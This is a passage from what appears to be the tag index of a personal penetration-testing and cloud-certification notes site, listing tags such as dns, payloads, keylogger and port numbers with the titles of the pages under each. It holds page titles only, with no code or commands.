                        • AZ-500 Microsoft Azure Active Directory- Platform protection
                        • AZ-500 Microsoft Azure Active Directory- Data and applications
                        • AZ-500 Microsoft Azure Active Directory- Security operations
                        • Exams - Practice the AZ-500
                        • AZ-500 Microsoft Azure Security Technologies Certificate - keep learning
                        • AZ-500 Microsoft Azure Security Technologies Certificate
                        • Exams - Practice the AZ-900
                        • AZ-900 Notes to get through the Azure Fundamentals Certificate
                        ","tags":["tags"]},{"location":"tags/#cheat","title":"cheat","text":"
                        • Pentesting Powerapp
                        ","tags":["tags"]},{"location":"tags/#cheat-sheet","title":"cheat sheet","text":"
                        • msSQL - Microsoft SQL Server
                        • Responder.py - An SMB server to listen for NTLM hashes
                        • sqsh
                        ","tags":["tags"]},{"location":"tags/#checklist","title":"checklist","text":"
                        • Thick client Applications Pentesting Checklist
                        ","tags":["tags"]},{"location":"tags/#checksum","title":"checksum","text":"
                        • Checksum
                        ","tags":["tags"]},{"location":"tags/#chrome","title":"chrome","text":"
                        • Pentesting browsers
                        ","tags":["tags"]},{"location":"tags/#cloud","title":"cloud","text":"
                        • AWS cli
                        • Azure-CLI
                        • Azure Powershell
                        • gcloud CLI
                        • Apache CloudStack Essentials
                        • Amazon Web Services (AWS) Essentials
                        • Pentesting Amazon Web Services (AWS)
                        • AZ-104 Microsoft Azure Administrator certificate
                        • AZ-500 Microsoft Azure Active Directory- Manage Identity and Access
                        • AZ-500 Microsoft Azure Active Directory- Platform protection
                        • AZ-500 Microsoft Azure Active Directory- Data and applications
                        • AZ-500 Microsoft Azure Active Directory- Security operations
                        • Exams - Practice the AZ-500
                        • AZ-500 Microsoft Azure Security Technologies Certificate - keep learning
                        • AZ-500 Microsoft Azure Security Technologies Certificate
                        • Exams - Practice the AZ-900
                        • AZ-900 Notes to get through the Azure Fundamentals Certificate
                        • Pentesting Azure
                        • Pentesting docker
                        • Google Cloud Platform Essentials
                        • Openstack Essentials
                        ","tags":["tags"]},{"location":"tags/#cloud-pentesting","title":"cloud pentesting","text":"
                        • Pentesting cloud
                        ","tags":["tags"]},{"location":"tags/#cms_1","title":"cms","text":"
                        • moodlescan
                        ","tags":["tags"]},{"location":"tags/#connection-problems","title":"connection problems","text":"
                        • How to resolve run-of-the-mill connection problems
                        ","tags":["tags"]},{"location":"tags/#containers","title":"containers","text":"
                        • Pentesting docker
                        ","tags":["tags"]},{"location":"tags/#course","title":"course","text":"
                        • eWPT Preparation
                        • AZ-104 Microsoft Azure Administrator certificate
                        • AZ-500 Microsoft Azure Active Directory- Manage Identity and Access
                        • AZ-500 Microsoft Azure Active Directory- Platform protection
                        • AZ-500 Microsoft Azure Active Directory- Data and applications
                        • AZ-500 Microsoft Azure Active Directory- Security operations
                        • AZ-500 Microsoft Azure Security Technologies Certificate - keep learning
                        • AZ-500 Microsoft Azure Security Technologies Certificate
                        • AZ-900 Notes to get through the Azure Fundamentals Certificate
                        ","tags":["tags"]},{"location":"tags/#cpts_1","title":"cpts","text":"
                        • Contract - Checklist
                        • Contractors Agreement - Checklist for Physical Assessments
                        • Rules of Engagement - Checklist
                        ","tags":["tags"]},{"location":"tags/#cracking-tool","title":"cracking tool","text":"
                        • Hashcat - A password recovery tool
                        ","tags":["tags"]},{"location":"tags/#crytography","title":"crytography","text":"
                        • cryptography
                        ","tags":["tags"]},{"location":"tags/#cvss","title":"cvss","text":"
                        • CVSS Common Vulnerability Scoring System
                        • Microsoft DREAD
                        ","tags":["tags"]},{"location":"tags/#cybersecurity","title":"cybersecurity","text":"
                        • Welcome to Hacking Life!
                        ","tags":["tags"]},{"location":"tags/#database","title":"database","text":"
                        • MariaDB
                        • Mongo
                        • Mongo
                        • msSQL - Microsoft SQL Server
                        • MySQL
                        • Pentesting Powerapp
                        • sqlite
                        • sqlite
                        • sqsh
                        • Virtual environments
                        • Virtual environments
                        ","tags":["tags"]},{"location":"tags/#ddns","title":"ddns","text":"
                        • Coding a DDNS aware shell
                        ","tags":["tags"]},{"location":"tags/#deserialization","title":"deserialization","text":"
                        • Phpggc - A tool for PHP deserialization
                        • Ysoserial - A tool for Java deserialization
                        • BurpSuite Labs - Insecure deserialization
                        ","tags":["tags"]},{"location":"tags/#dictionaries","title":"dictionaries","text":"
                        • cewl - A custom dictionary generator
                        • crunch - A dictionary generator
                        ","tags":["tags"]},{"location":"tags/#dictionary","title":"dictionary","text":"
                        • CUPP - Common User Password Profiler
                        • Dictionaries or wordlists resources
                        • Creating malware and custom payloads
                        ","tags":["tags"]},{"location":"tags/#dictionary-attack","title":"dictionary attack","text":"
                        • John the Ripper - A hash cracker and dictionary attack tool
                        ","tags":["tags"]},{"location":"tags/#dictionary-generator","title":"dictionary generator","text":"
                        • CUPP - Common User Password Profiler
                        ","tags":["tags"]},{"location":"tags/#directory","title":"directory","text":"
                        • Port 389 - 636 LDAP
                        ","tags":["tags"]},{"location":"tags/#directory-enumeration","title":"directory enumeration","text":"
                        • dirb - A web content enumeration tool
                        ","tags":["tags"]},{"location":"tags/#django","title":"django","text":"
                        • django pentesting
                        ","tags":["tags"]},{"location":"tags/#dll-hickjacking","title":"dll hickjacking","text":"
                        • Attacking thick clients applications - Data storage issues
                        ","tags":["tags"]},{"location":"tags/#dns","title":"dns","text":"
                        • dig axfr
                        • dnsenum - A tool to enumerate DNS
                        • DNSRecon - DNS Enumeration and Scanning Tool
                        • fierce - DNS scanner that helps locate non-contiguous IP space and hostnames
                        • How to resolve run-of-the-mill connection problems
                        • nslookup
                        ","tags":["tags"]},{"location":"tags/#dns-enumeration","title":"dns enumeration","text":"
                        • Amass
                        ","tags":["tags"]},{"location":"tags/#dnspy","title":"dnspy","text":"
                        • Attacking thick clients applications - Data storage issues
                        • First challenge - Enabling a button - Thick client Applications
                        • Reversing and patching thick clients applications
                        ","tags":["tags"]},{"location":"tags/#docker","title":"docker","text":"
                        • docker
                        • Pentesting docker
                        ","tags":["tags"]},{"location":"tags/#domain","title":"domain","text":"
                        • Port 53 - Domain Name Server (DNS)
                        • crt.sh
                        • dnscan - A DNS subdomain scanner
                        ","tags":["tags"]},{"location":"tags/#dorking","title":"dorking","text":"
                        • Github dorks
                        • Google dorks
                        ","tags":["tags"]},{"location":"tags/#dorkings","title":"dorkings","text":"
                        • Test Network Infrastructure Configuration - OWASP Web Security Testing Guide
                        • Conduct search engine discovery reconnaissance for information leakage - OWASP Web Security Testing Guide
                        • Fingerprint Web Server - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#dotpeek","title":"dotpeek","text":"
                        • Reversing and patching thick clients applications
                        ","tags":["tags"]},{"location":"tags/#dovecot","title":"dovecot","text":"
                        • 55006-55007 Dovecot pop3
                        ","tags":["tags"]},{"location":"tags/#dread","title":"dread","text":"
                        • Microsoft DREAD
                        ","tags":["tags"]},{"location":"tags/#dump-hashes","title":"dump hashes","text":"
                        • CrackMapExec
                        • Invoke-TheHash
                        • mimikatz
                        • pypykatz
                        ","tags":["tags"]},{"location":"tags/#ewpt","title":"eWPT","text":"
                        • 01. Information Gathering / Footprinting
                        • Pentesting Notes
                        ","tags":["tags"]},{"location":"tags/#echo-mirage","title":"echo mirage","text":"
                        • Traffic analysis - Thick client Applications
                        ","tags":["tags"]},{"location":"tags/#encryption","title":"encryption","text":"
                        • TCP reverse shell with AES encryption
                        • TCP reverse shell with hybrid encryption AES + RSA
                        • TCP reverse shell with RSA encryption
                        ","tags":["tags"]},{"location":"tags/#engagement","title":"engagement","text":"
                        • Contract - Checklist
                        • Contractors Agreement - Checklist for Physical Assessments
                        ","tags":["tags"]},{"location":"tags/#enumeration","title":"enumeration","text":"
                        • The ActiveDirectory PowerShell module
                        • Amass
                        • Aquatone - Automate web scanning across large subdomain lists
                        • BloodHound
                        • braa - SNMP scanner
                        • cewl - A custom dictionary generator
                        • crunch - A dictionary generator
                        • CUPP - Common User Password Profiler
                        • dig axfr
                        • dnsenum - A tool to enumerate DNS
                        • DNSRecon - DNS Enumeration and Scanning Tool
                        • enum
                        • enum4linux
                        • EyeWitness
                        • ffuf - A fast web fuzzer written in Go
                        • fierce - DNS scanner that helps locate non-contiguous IP space and hostnames
                        • Hashcat - A password recovery tool
                        • Bank - A HackTheBox machine
                        • Popcorn - A HackTheBox machine
                        • httprint - A web server fingerprinting tool
                        • JAWS - Just Another Windows (Enum) Script
                        • John the Ripper - A hash cracker and dictionary attack tool
                        • knockpy - A subdomain scanner
                        • LinEnum - A tool to scan Linux system
                        • nslookup
                        • odat - Oracle Database Attacking Tool
                        • onesixtyone - Fast and simple SNMP scanner
                        • Seatbelt - A tool to scan Windows system
                        • SharpView
                        • snmpwalk - SNMP scanner
                        • WafW00f - A firewall scanner
                        • Weevely - A PHP webshell backdoor generator
                        • whatweb - A web scanner
                        • wpscan - Wordpress Security Scanner
                        ","tags":["tags"]},{"location":"tags/#evading-detection","title":"evading detection","text":"
                        • Evading detection in file transfers
                        ","tags":["tags"]},{"location":"tags/#exploitation","title":"exploitation","text":"
                        • searchsploit
                        • Evading detection in file transfers
                        • Transferring files with code
                        • Transferring files techniques - Linux
                        • Transferring files techniques - Windows
                        • OWASP Web Security Testing Guide
                        • Web Exploitation Guide
                        ","tags":["tags"]},{"location":"tags/#file","title":"file","text":"
                        • exiftool - A tool for metadata editing
                        ","tags":["tags"]},{"location":"tags/#file-integrity","title":"file integrity","text":"
                        • Checksum
                        ","tags":["tags"]},{"location":"tags/#file-transfer","title":"file transfer","text":"
                        • Setting up servers
                        ","tags":["tags"]},{"location":"tags/#file-transfer-technique","title":"file transfer technique","text":"
                        • Evading detection in file transfers
                        • Transferring files with code
                        • Transferring files techniques - Linux
                        • Transferring files techniques - Windows
                        • uploadserver
                        ","tags":["tags"]},{"location":"tags/#file-upload","title":"file upload","text":"
                        • smbmap
                        ","tags":["tags"]},{"location":"tags/#fingerprinting","title":"fingerprinting","text":"
                        • httprint - A web server fingerprinting tool
                        ","tags":["tags"]},{"location":"tags/#firefox","title":"firefox","text":"
                        • Pentesting browsers
                        • Man in the browser attack
                        ","tags":["tags"]},{"location":"tags/#firewall","title":"firewall","text":"
                        • Bypassing Next Generation Firewalls
                        ","tags":["tags"]},{"location":"tags/#footprinting","title":"footprinting","text":"
                        • 01. Information Gathering / Footprinting
                        ","tags":["tags"]},{"location":"tags/#forensic","title":"forensic","text":"
                        • Computer Forensic Fundamentals
                        ","tags":["tags"]},{"location":"tags/#ftp","title":"ftp","text":"
                        • 21 ftp
                        • Walkthrough - A HackTheBox machine - Funnel
                        ","tags":["tags"]},{"location":"tags/#ftp-server","title":"ftp server","text":"
                        • pyftpdlib - An FTP server written in python
                        ","tags":["tags"]},{"location":"tags/#gcp","title":"gcp","text":"
                        • gcloud CLI
                        • Google Cloud Platform Essentials
                        ","tags":["tags"]},{"location":"tags/#google-cloud-platform","title":"google cloud platform","text":"
                        • gcloud CLI
                        • Google Cloud Platform Essentials
                        ","tags":["tags"]},{"location":"tags/#headers","title":"headers","text":"
                        • CSRF attack - Cross Site Request Forgery
                        ","tags":["tags"]},{"location":"tags/#host-based-firewall","title":"host based firewall","text":"
                        • Hijack the Internet Explorer process to bypass a host-based firewall
                        ","tags":["tags"]},{"location":"tags/#http_1","title":"http","text":"
                        • netcat
                        ","tags":["tags"]},{"location":"tags/#idasm","title":"idasm","text":"
                        • Reversing and patching thick clients applications
                        ","tags":["tags"]},{"location":"tags/#ilasm","title":"ilasm","text":"
                        • Reversing and patching thick clients applications
                        ","tags":["tags"]},{"location":"tags/#ilspy","title":"ilspy","text":"
                        • Reversing and patching thick clients applications
                        ","tags":["tags"]},{"location":"tags/#imap","title":"imap","text":"
                        • Ports 110, 143, 993, 995 IMAP POP3
                        ","tags":["tags"]},{"location":"tags/#impacket","title":"impacket","text":"
                        • 1433 msSQL
                        • smbserver - from impacket
                        ","tags":["tags"]},{"location":"tags/#information-gathering","title":"information gathering","text":"
                        • Information gathering
                        ","tags":["tags"]},{"location":"tags/#information-gathering_1","title":"information-gathering","text":"
                        • Contract - Checklist
                        • Contractors Agreement - Checklist for Physical Assessments
                        • Rules of Engagement - Checklist
                        ","tags":["tags"]},{"location":"tags/#intelligent-platform-management-interface","title":"intelligent platform management interface","text":"
                        • 623 - Intelligent Platform Management Interface (IPMI)
                        ","tags":["tags"]},{"location":"tags/#ipmi","title":"ipmi","text":"
                        • 623 - Intelligent Platform Management Interface (IPMI)
                        • IPMItool
                        ","tags":["tags"]},{"location":"tags/#ips","title":"ips","text":"
                        • Bypassing IPS with handmade XOR Encryption
                        ","tags":["tags"]},{"location":"tags/#java","title":"java","text":"
                        • Log4j
                        • Ysoserial - A tool for Java deserialization
                        ","tags":["tags"]},{"location":"tags/#java-rmi","title":"java rmi","text":"
                        • 1090 java rmi
                        ","tags":["tags"]},{"location":"tags/#jboss","title":"jboss","text":"
                        • 8080 JBoss AS Instance 6.1.0
                        ","tags":["tags"]},{"location":"tags/#jndi","title":"jndi","text":"
                        • Walkthrough - Unified - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#jwt","title":"jwt","text":"
                        • BurpSuite Labs - Json Web Token jwt
                        • Json Web Token attacks
                        ","tags":["tags"]},{"location":"tags/#keycloak","title":"keycloak","text":"
                        • Pentesting Keycloak
                        ","tags":["tags"]},{"location":"tags/#keylogger","title":"keylogger","text":"
                        • Dumping saved passwords from Google Chrome
                        • Hijacking Keepass Password Manager
                        • Simple keylogger in python
                        ","tags":["tags"]},{"location":"tags/#labs","title":"labs","text":"
                        • Basic Lab Setup - Thick client Applications
                        ","tags":["tags"]},{"location":"tags/#language","title":"language","text":"
                        • Markdown
                        ","tags":["tags"]},{"location":"tags/#ldap","title":"ldap","text":"
                        • Port 389 - 636 LDAP
                        • Active Directory - LDAP
                        • The ActiveDirectory PowerShell module
                        • BloodHound
                        • Microsoft Management Console (MMC)
                        • NT Authority System
                        • PowerUp.ps1
                        • Responder.py - An SMB server that listens for NTLM hashes
                        • SharpView
                        ","tags":["tags"]},{"location":"tags/#linux","title":"linux","text":"
                        • Arp poisoning
                        • Configuration files
                        • Cron jobs - path, wildcards, file overwrite.
                        • Dirty COW (Copy On Write)
                        • Kernel vulnerability exploitation
                        • Linux credentials storage
                        • lxd
                        • postfix - A SMTP server
                        • Process capabilities - getcap
                        • SSH keys
                        • Suid Binaries
                        • Transferring files techniques - Linux
                        ","tags":["tags"]},{"location":"tags/#linux-pentesting","title":"linux pentesting","text":"
                        • LinEnum - A tool to scan Linux systems
                        • linPEAS - A tool to scan Linux systems
                        • Linux Privilege Checker
                        ","tags":["tags"]},{"location":"tags/#linux-privilege-escalation","title":"linux privilege escalation","text":"
                        • Base - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#local-file-inclusion","title":"local file inclusion","text":"
                        • Responder - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#log4j","title":"log4j","text":"
                        • Walkthrough - Unified - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#lxd","title":"lxd","text":"
                        • lxd
                        ","tags":["tags"]},{"location":"tags/#lxd-exploitation","title":"lxd exploitation","text":"
                        • Walkthrough - Included - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#mariadb","title":"mariadb","text":"
                        • 3306 mariadb mysql
                        • Sequel - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#metasploit","title":"metasploit","text":"
                        • Lame - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#microsoft","title":"microsoft","text":"
                        • Exams - Practice the AZ-500
                        • Exams - Practice the AZ-900
                        ","tags":["tags"]},{"location":"tags/#mimikatz","title":"mimikatz","text":"
                        • 3389 RDP
                        ","tags":["tags"]},{"location":"tags/#mitm-relay","title":"mitm relay","text":"
                        • Traffic analysis - Thick client Applications
                        ","tags":["tags"]},{"location":"tags/#mobile-pentesting","title":"mobile pentesting","text":"
                        • Android Debug Bridge - ADB
                        • apktool
                        • drozer - A security testing framework for Android
                        • Frida - A dynamic instrumentation toolkit
                        • Mobile Security Framework - MobSF
                        • Objection
                        • scrcpy
                        • Setting up the mobile pentesting environment
                        ","tags":["tags"]},{"location":"tags/#mongodb","title":"mongodb","text":"
                        • 27017-27018 mongodb
                        • Walkthrough - A HackTheBox machine - Mongod
                        • Walkthrough - Unified - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#moodle","title":"moodle","text":"
                        • moodlescan
                        ","tags":["tags"]},{"location":"tags/#mssql","title":"mssql","text":"
                        • 1433 msSQL
                        • sqsh
                        ","tags":["tags"]},{"location":"tags/#mysql","title":"mysql","text":"
                        • 3306 mariadb mysql
                        ","tags":["tags"]},{"location":"tags/#nessus","title":"nessus","text":"
                        • Vulnerability assessment
                        ","tags":["tags"]},{"location":"tags/#network","title":"network","text":"
                        • Network traffic capture tools
                        • vnstat - Monitoring network impact
                        ","tags":["tags"]},{"location":"tags/#network-services","title":"network services","text":"
                        • Well-known ports
                        ","tags":["tags"]},{"location":"tags/#next-generation-firewalls","title":"next generation firewalls","text":"
                        • Bypassing Next Generation Firewalls
                        ","tags":["tags"]},{"location":"tags/#nmap","title":"nmap","text":"
                        • xsltproc
                        ","tags":["tags"]},{"location":"tags/#odata","title":"oData","text":"
                        • Pentesting oDAta
                        ","tags":["tags"]},{"location":"tags/#of","title":"of","text":"
                        • Contract - Checklist
                        • Contractors Agreement - Checklist for Physical Assessments
                        ","tags":["tags"]},{"location":"tags/#open-source","title":"open source","text":"
                        • Apache CloudStack Essentials
                        • Openstack Essentials
                        ","tags":["tags"]},{"location":"tags/#openssl","title":"openssl","text":"
                        • openSSL - Cryptography and SSL/TLS Toolkit
                        ","tags":["tags"]},{"location":"tags/#openvas","title":"openvas","text":"
                        • Vulnerability assessment
                        ","tags":["tags"]},{"location":"tags/#oracle-tns","title":"oracle tns","text":"
                        • 1521 - Oracle Transparent Network Substrate (TNS)
                        • sqlplus - To connect and manage the Oracle RDBMS
                        ","tags":["tags"]},{"location":"tags/#osint","title":"osint","text":"
                        • Github dorks
                        • Google dorks
                        ","tags":["tags"]},{"location":"tags/#package-manager","title":"package manager","text":"
                        • pip
                        ","tags":["tags"]},{"location":"tags/#pass-the-hash-attack","title":"pass the hash attack","text":"
                        • Invoke-TheHash
                        • mimikatz
                        ","tags":["tags"]},{"location":"tags/#pass-the-hash","title":"pass-the-hash","text":"
                        • smbmap
                        ","tags":["tags"]},{"location":"tags/#passive-reconnaissance","title":"passive reconnaissance","text":"
                        • p0f
                        ","tags":["tags"]},{"location":"tags/#passiverecon","title":"passiverecon","text":"
                        • HTTrack - A tool for mirroring sites
                        • nmap - A network exploration and security auditing tool
                        • Powercat - An alternative to netcat coded in PowerShell
                        ","tags":["tags"]},{"location":"tags/#password-cracker","title":"password cracker","text":"
                        • ophcrack - A Windows password cracker based on rainbow tables
                        ","tags":["tags"]},{"location":"tags/#passwords","title":"passwords","text":"
                        • CrackMapExec
                        • hydra
                        • Invoke-TheHash
                        • Lazagne
                        • medusa
                        • mimikatz
                        • pypykatz
                        ","tags":["tags"]},{"location":"tags/#payloads","title":"payloads","text":"
                        • darkarmour
                        • mythic
                        • nishang
                        • Creating malware and custom payloads
                        ","tags":["tags"]},{"location":"tags/#pentest","title":"pentest","text":"
                        • Information gathering
                        ","tags":["tags"]},{"location":"tags/#pentesting","title":"pentesting","text":"
                        • Welcome to Hacking Life!
                        • 22 ssh
                        • 3128 squid
                        • Port 53 - Domain Name Server (DNS)
                        • 69 - tftp
                        • Aquatone - Automate web scanning across large subdomain lists
                        • Bind Shells
                        • Pentesting browsers
                        • Configuration files
                        • Cron jobs - path, wildcards, file overwrite.
                        • curl
                        • dig axfr
                        • dirb - A web content enumeration tool
                        • Dirty COW (Copy On Write)
                        • django pentesting
                        • dnscan - A DNS subdomain scanner
                        • dnsenum - A tool to enumerate DNS
                        • DNSpy - A .NET decompiler for windows
                        • DNSRecon - DNS Enumeration and Scanning Tool
                        • eJPT - eLearnSecurity Junior Penetration Tester
                        • exiftool - A tool for metadata editing
                        • EyeWitness
                        • feroxbuster - A web content enumeration tool for unreferenced resources
                        • ffuf - A fast web fuzzer written in Go
                        • fierce - DNS scanner that helps locate non-contiguous IP space and hostnames
                        • Gopherus
                        • grep
                        • Hashcat - A password recovery tool
                        • httprint - A web server fingerprinting tool
                        • hydra
                        • ntlmrelayx - a module from Impacket
                        • PsExec - a module from Impacket
                        • SMBExec - a module from Impacket
                        • Impacket - A python tool for network protocols
                        • IPMItool
                        • JAWS - Just Another Windows (Enum) Script
                        • John the Ripper - A hash cracker and dictionary attack tool
                        • Kernel vulnerability exploitation
                        • knockpy - A subdomain scanner
                        • Lateral movements
                        • Laudanum - Injectable Web Exploit Code
                        • Lazagne
                        • LinEnum - A tool to scan Linux systems
                        • linPEAS - A tool to scan Linux systems
                        • Linux exploit suggester
                        • Linux Privilege Checker
                        • LOLbins - Living off the land binaries - LOLBAS and GTFOBins
                        • M365 CLI
                        • medusa
                        • metasploit
                        • moodlescan
                        • msfvenom
                        • Pentesting MyBB
                        • netcraft
                        • netdiscover - A network enumeration tool based on ARP requests
                        • Network traffic capture tools
                        • noip
                        • nslookup
                        • Pentesting OData
                        • ophcrack - A Windows password cracker based on rainbow tables
                        • Pentesting Notes
                        • pyftpdlib - An FTP server written in python
                        • pyinstaller
                        • Reverse Shells
                        • Samba Suite
                        • searchsploit
                        • Seatbelt - A tool to scan Windows systems
                        • Spawn a shell
                        • SQLi Cheat sheet for manual injection
                        • sqlmap - A tool for testing SQL injection
                        • SSH keys
                        • sslyze - A tool for scanning certificates
                        • sublist3r - A subdomain enumerating tool
                        • Suid Binaries
                        • tcpdump - A command-line packet analyzer
                        • The Harvester - A tool for passive and active reconnaissance
                        • Tmux - A terminal multiplexer
                        • veil - A backdoor generator
                        • Vulnerability assessment
                        • Vulnhub Raven 1
                        • Vulnhub Raven 2
                        • w3af
                        • WafW00f - A firewall scanner
                        • waybackurls
                        • Pentesting web services
                        • Web Shells
                        • WebDAV - WsgiDAV - A generic and extendable WebDAV server
                        • Weevely - A PHP webshell backdoor generator
                        • wfuzz
                        • whatweb - A web scanner
                        • Window Detective - A tool to view window properties in the system
                        • Windows binaries - LOLBAS
                        • winspy - A tool to view window properties in the system
                        • pentesting wordpress
                        • wpscan - Wordpress Security Scanner
                        • xsltproc
                        • XSSer - An automated web pentesting framework tool to detect and exploit XSS vulnerabilities
                        • OWASP Web Security Testing Guide
                        • Review Webserver Metafiles for Information Leakage - OWASP Web Security Testing Guide
                        • Enumerate Applications on Webserver - OWASP Web Security Testing Guide
                        • Review Webpage content for Information Leakage - OWASP Web Security Testing Guide
                        • Identify Application Entry Points - OWASP Web Security Testing Guide
                        • Map Execution Paths through applications - OWASP Web Security Testing Guide
                        • Fingerprint Web Application Framework - OWASP Web Security Testing Guide
                        • Fingerprint Web Applications - OWASP Web Security Testing Guide
                        • Map Application architecture - OWASP Web Security Testing Guide
                        • Mifare Classic
                        • Mifare Desfire
                        • NFC - Setting up proxmark3 RDV4.01
                        • Proxmark3 RDV4.01
                        • RFID
                        • Web Exploitation Guide
                        • Arbitrary file upload
                        • CSRF attack - Cross Site Request Forgery
                        • Directory Traversal attack
                        • Insecure deserialization
                        • Json Web Token attacks
                        • LFI attack - Local File Inclusion
                        • NoSQL injection
                        • RFD attack - Reflected File Download
                        • RCE attack - Remote Code Execution
                        • RFI attack - Remote File Inclusion
                        • SSRF attack - Server Side Request Forgery
                        • Server-side Template Injection - SSTI
                        • Session Puzzling - Session Variable Overloading
                        • SQL injection
                        ","tags":["tags"]},{"location":"tags/#pentesting-http-headers","title":"pentesting HTTP headers","text":"
                        • HTTP headers
                        ","tags":["tags"]},{"location":"tags/#pentesting-cloud","title":"pentesting cloud","text":"
                        • Pentesting Amazon Web Services (AWS)
                        • Pentesting Azure
                        ","tags":["tags"]},{"location":"tags/#pentesting-windows","title":"pentesting windows","text":"
                        • SAMRDump
                        • smbserver - from impacket
                        • Windows Null session attack
                        • Winfo
                        ","tags":["tags"]},{"location":"tags/#pentestingc","title":"pentesting\u00e7","text":"
                        • Weevely - A PHP webshell backdoor generator
                        ","tags":["tags"]},{"location":"tags/#persistence","title":"persistence","text":"
                        • Making your binary persistent
                        ","tags":["tags"]},{"location":"tags/#phishing","title":"phishing","text":"
                        • BeEF - The browser exploitation framework project
                        • Tools for cloning a site
                        ","tags":["tags"]},{"location":"tags/#php","title":"php","text":"
                        • pentestmonkey php reverse shell
                        • Phpggc - A tool for PHP deserialization
                        • WhiteWinterWolf php webshell
                        ","tags":["tags"]},{"location":"tags/#php-include","title":"php include","text":"
                        • Responder - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#php-type-juggling","title":"php type juggling","text":"
                        • Base - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#ping","title":"ping","text":"
                        • fping - An improved ping tool
                        • How to resolve run-of-the-mill connection problems
                        ","tags":["tags"]},{"location":"tags/#pop3","title":"pop3","text":"
                        • Ports 110, 143, 993, 995 IMAP POP3
                        ","tags":["tags"]},{"location":"tags/#port","title":"port","text":"
                        • Port 389 - 636 LDAP
                        ","tags":["tags"]},{"location":"tags/#port-1090","title":"port 1090","text":"
                        • 1090 java rmi
                        ","tags":["tags"]},{"location":"tags/#port-110","title":"port 110","text":"
                        • Ports 110, 143, 993, 995 IMAP POP3
                        ","tags":["tags"]},{"location":"tags/#port-111","title":"port 111","text":"
                        • Port 111, 32731 - rpc
                        • Port 2049 - NFS Network File System
                        • Port 43 - whois
                        ","tags":["tags"]},{"location":"tags/#port-137","title":"port 137","text":"
                        • Ports 137, 138, 139, 445 SMB
                        • rpcclient - A tool for interacting with smb shares
                        • smbclient - A tool for interacting with smb shares
                        ","tags":["tags"]},{"location":"tags/#port-138","title":"port 138","text":"
                        • Ports 137, 138, 139, 445 SMB
                        • rpcclient - A tool for interacting with smb shares
                        • smbclient - A tool for interacting with smb shares
                        ","tags":["tags"]},{"location":"tags/#port-139","title":"port 139","text":"
                        • Ports 137, 138, 139, 445 SMB
                        • rpcclient - A tool for interacting with smb shares
                        • smbclient - A tool for interacting with smb shares
                        ","tags":["tags"]},{"location":"tags/#port-143","title":"port 143","text":"
                        • Ports 110, 143, 993, 995 IMAP POP3
                        ","tags":["tags"]},{"location":"tags/#port-1433","title":"port 1433","text":"
                        • 1433 msSQL
                        ","tags":["tags"]},{"location":"tags/#port-1521","title":"port 1521","text":"
                        • 1521 - Oracle Transparent Network Substrate (TNS)
                        • sqlplus - To connect and manage the Oracle RDBMS
                        ","tags":["tags"]},{"location":"tags/#port-161","title":"port 161","text":"
                        • 161-162 SNMP Simple Network Management Protocol
                        • braa - SNMP scanner
                        • odat - Oracle Database Attacking Tool
                        • onesixtyone - Fast and simple SNMP scanner
                        • snmpwalk - SNMP scanner
                        ","tags":["tags"]},{"location":"tags/#port-162","title":"port 162","text":"
                        • 1521 - Oracle Transparent Network Substrate (TNS)
                        • 161-162 SNMP Simple Network Management Protocol
                        ","tags":["tags"]},{"location":"tags/#port-20","title":"port 20","text":"
                        • 21 ftp
                        ","tags":["tags"]},{"location":"tags/#port-2049","title":"port 2049","text":"
                        • Port 2049 - NFS Network File System
                        ","tags":["tags"]},{"location":"tags/#port-21","title":"port 21","text":"
                        • 21 ftp
                        ","tags":["tags"]},{"location":"tags/#port-22","title":"port 22","text":"
                        • 22 ssh
                        ","tags":["tags"]},{"location":"tags/#port-23","title":"port 23","text":"
                        • 23 telnet
                        ","tags":["tags"]},{"location":"tags/#port-25","title":"port 25","text":"
                        • Ports 25, 465, 587 - Simple Mail Transfer Protocol (SMTP)
                        ","tags":["tags"]},{"location":"tags/#port-27017","title":"port 27017","text":"
                        • 27017-27018 mongodb
                        • Walkthrough - A HackTheBox machine - Mongod
                        ","tags":["tags"]},{"location":"tags/#port-27018","title":"port 27018","text":"
                        • 27017-27018 mongodb
                        ","tags":["tags"]},{"location":"tags/#port-3128","title":"port 3128","text":"
                        • 3128 squid
                        ","tags":["tags"]},{"location":"tags/#port-3306","title":"port 3306","text":"
                        • 3306 mariadb mysql
                        • Sequel - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#port-3389","title":"port 3389","text":"
                        • 3389 RDP
                        ","tags":["tags"]},{"location":"tags/#port-445","title":"port 445","text":"
                        • Ports 137, 138, 139, 445 SMB
                        • Tactics - A HackTheBox machine
                        • rpcclient - A tool for interacting with smb shares
                        • smbclient - A tool for interacting with smb shares
                        ","tags":["tags"]},{"location":"tags/#port-465","title":"port 465","text":"
                        • Ports 25, 465, 587 - Simple Mail Transfer Protocol (SMTP)
                        ","tags":["tags"]},{"location":"tags/#port-5432","title":"port 5432","text":"
                        • 5432 postgresql
                        ","tags":["tags"]},{"location":"tags/#port-55007","title":"port 55007","text":"
                        • 55006-55007 Dovecot pop3
                        ","tags":["tags"]},{"location":"tags/#port-55008","title":"port 55008","text":"
                        • 55006-55007 Dovecot pop3
                        ","tags":["tags"]},{"location":"tags/#port-587","title":"port 587","text":"
                        • Ports 25, 465, 587 - Simple Mail Transfer Protocol (SMTP)
                        ","tags":["tags"]},{"location":"tags/#port-5985","title":"port 5985","text":"
                        • Port 5985, 5986 - WinRM - Windows Remote Management
                        ","tags":["tags"]},{"location":"tags/#port-5986","title":"port 5986","text":"
                        • Port 5985, 5986 - WinRM - Windows Remote Management
                        ","tags":["tags"]},{"location":"tags/#port-623","title":"port 623","text":"
                        • 623 - Intelligent Platform Management Interface (IPMI)
                        • IPMItool
                        ","tags":["tags"]},{"location":"tags/#port-6379","title":"port 6379","text":"
                        • 6379 redis
                        ","tags":["tags"]},{"location":"tags/#port-6653","title":"port 6653","text":"
                        • 6653 OpenFlow
                        ","tags":["tags"]},{"location":"tags/#port-69","title":"port 69","text":"
                        • Walkthrough - Included - A HackTheBox machine
